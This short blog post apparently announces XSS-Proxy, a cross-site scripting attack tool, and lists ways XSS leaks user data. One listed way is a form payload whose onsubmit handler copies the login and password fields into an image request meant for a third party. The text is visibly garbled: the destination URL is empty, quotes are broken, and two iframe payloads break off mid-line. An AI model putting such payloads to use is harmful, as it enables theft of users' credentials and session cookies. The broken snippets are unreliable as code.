RSS Feed for This PostCurrent Article

Cross Site Scripting Attack Tool

XSS-Proxy is an advanced Cross-Site-Scripting (XSS) attack tool.

Types of information leakage due to XSS attack

1. Client can reveal cookies to 3rd party (session state, order info, etc)


2. Client can reveal posted form items to 3rd party (userID/passwd, etc)

<form> action="logoninformation.jsp" method="post" onsubmit="hackImg=new Image; hackImg.src=’’+document.forms(1).login.value’+’:’+ document.forms(1).password.value;" </form>

3. Client can be tricked into accessing/posting spoofed info to trusted server"> = <iframe

4. Client can be tricked into attacking other sites

/hello.asp?name = <iframe

Trackback URL

Sorry, comments for this entry are closed at this time.